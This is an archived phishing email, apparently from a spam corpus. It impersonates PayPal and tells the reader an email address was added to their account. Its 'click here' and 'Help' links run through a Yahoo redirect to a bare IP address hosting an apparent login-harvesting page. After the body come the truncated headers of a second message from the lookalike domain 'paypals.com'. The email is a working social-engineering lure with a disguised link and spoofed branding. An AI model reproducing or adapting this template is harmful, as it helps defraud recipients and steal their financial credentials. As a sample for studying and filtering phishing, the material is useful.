From: "service@paypal.com" <service@paypal.com>
Subject: You've added an additional email address to your PayPal account
Date: Fri, 5 May 2006 22:13:53 -0600
MIME-Version: 1.0
Content-Type: text/html;
	charset="Windows-1251"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Message-Id: <20060505231518.8D9876CCE4E@mail1.example.com>
To: undisclosed-recipients: ;
Status: 
X-Status: 
X-Keywords:                   

<html>

<head>
<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
<meta name=Generator content="Microsoft Word 11 (filtered)">
<title>You've added an additional email address to your PayPal account</title> 
<style>
<!--
 /* Style Definitions */
 p.MsoNormal, li.MsoNormal, div.MsoNormal
 {margin:0in;
 margin-bottom:.0001pt;
 font-size:12.0pt;
 font-family:"Times New Roman";}
a:link, span.MsoHyperlink
 {color:blue;
 text-decoration:underline;}
a:visited, span.MsoHyperlinkFollowed
 {color:purple;
 text-decoration:underline;}
p
 {margin-right:0in;
 margin-left:0in;
 font-size: 12.0pt;
 font-family:"Times New Roman";}
@page Section1
 {size:8.5in 11.0in;
 margin:1.0in 1.25in 1.0in 1.25in;}
div.Section1
 {page:Section1;}
-->
</style>

</head>

<body lang=EN-US link=blue vlink=purple>

<div class=Section1>

<p class=MsoNormal><span style='font-size:11.0pt'>You've added an additional
email address to your PayPal account.</span></p>

  <p class=MsoNormal><span style='font-size:11.0pt'>If you don't agree with this 
    email denismce93@comcast.net and if you need 
    assistance </span><span style='font-size: 11.0pt'>with your account, </span></p>
  <p class=MsoNormal><span style='font-size:11.0pt'>please <a target="_blank"  href="http://rds.yahoo.com/_ylt  LaSV66fNtDg.kAUoJXNyoA;_ylu=X3oDMTE2ZHVuZ3E3BGNvbG8DdwRsA1dTMQRwb3MDMwRzZWMDc3IEdnRpZANGNjU1Xzc1/SIG8vsd1jp/EXP38544186/**http%3a//211.233.66.55/.us/link.php?bWFpIHByb3N0=aWxvciBtYWkgc3VnZXRpIHB1bGEgZnV0dXZhIG1hbWVsZSBpbiBndXRhIGRlIGxhYmFyaSBjZSBzdW50ZXRpIHNpIGRvYm90b2NpIHBpc2VtYX" 
> click here </a> to login to your account.</span></p>
  <p class=MsoNormal><span style='font-size:11.0pt'>&nbsp;</span></p>

  <p class=MsoNormal><span style='font-size:11.0pt'>To make sure you can use your 
    PayPal account the next time you make a purchase,</span></p>
  <p class=MsoNormal><span style='font-size: 11.0pt'> all you need to do is confirm 
    or not your email address. </span></p>

  <p class=MsoNormal><span style='font-size:11.0pt'>If your email program has problems 
    with hypertext links, </span></p>
  <p class=MsoNormal><span style='font-size:11.0pt'>you may also confirm your 
    email address by logging in to your account.</span></p>

<p class=MsoNormal><span style='font-size:11.0pt'>&nbsp;</span></p>

<p class=MsoNormal><span style='font-size:11.0pt'>&nbsp;</span></p>

<p class=MsoNormal><span style='font-size:11.0pt'>Thank you for using PayPal! </span></p>

<p class=MsoNormal><span style='font-size:11.0pt'>The PayPal Team</span></p>

<p class=MsoNormal><span style='font-size:11.0pt'>----------------------------------------------------------------</span></p>

<p class=MsoNormal><span style='font-size:11.0pt'>Please do not reply to this
email. This mailbox is not monitored and you will not receive a response.</span></p>

<p class=MsoNormal><span style='font-size:11.0pt'>For assistance, log in to
your PayPal account and click the <a target="_blank"  href="http://rds.yahoo.com/_ylt  LaSV66fNtDg.kAUoJXNyoA;_ylu=X3oDMTE2ZHVuZ3E3BGNvbG8DdwRsA1dTMQRwb3MDMwRzZWMDc3IEdnRpZANGNjU1Xzc1/SIG8vsd1jp/EXP38544186/**http%3a//211.233.66.55/.us/link.php?bWFpIHByb3N0=aWxvciBtYWkgc3VnZXRpIHB1bGEgZnV0dXZhIG1hbWVsZSBpbiBndXRhIGRlIGxhYmFyaSBjZSBzdW50ZXRpIHNpIGRvYm90b2NpIHBpc2VtYX" 
> Help</a> 
link located in the top right corner of any PayPal page. </span></p>

<p class=MsoNormal><span style='font-size:11.0pt'>----------------------------------------------------------------</span></p>

<p class=MsoNormal><span style='font-size:11.0pt'>&nbsp;</span></p>

<p class=MsoNormal><span style='font-size:11.0pt'>PayPal Email ID PP059</span></p>

</div>

</body>

</html>

From service@paypals.com  Sat May  6 16:33:45 2006
Return-Path: <service@paypals.com>
X-Original-To: nobody@login.example.com
Delivered-To: nobody@login.example.com
Received: from mail2.example.com (mail2.example.com [10.3.4.5])
	by naughty.example.com (Postfix) with ESMTP id 5F115CAB4AC
	for <nobody@login.example.com>; Sat,  6 May 2006 16:33:45 -0400 (EDT)
Received: from carya.site5.com (carya.site5.com [216.118.97.237])
	by mail2.example.com (Postfix) with ESMTP id 436AD6FA275
	for <nobody@example.com>; Sat,  6 May 2006 16:33:45 -0400 (EDT)
Received: from 66-191-136-10.static.roch.mn.charter.com ([66.191.136.10] helo=User)
	by carya.site5.com with esmtpa (Exim 4.52)
	id 1FcTR2-0002cp-4e; Sat, 06 May 2006 16:31:28 -0400
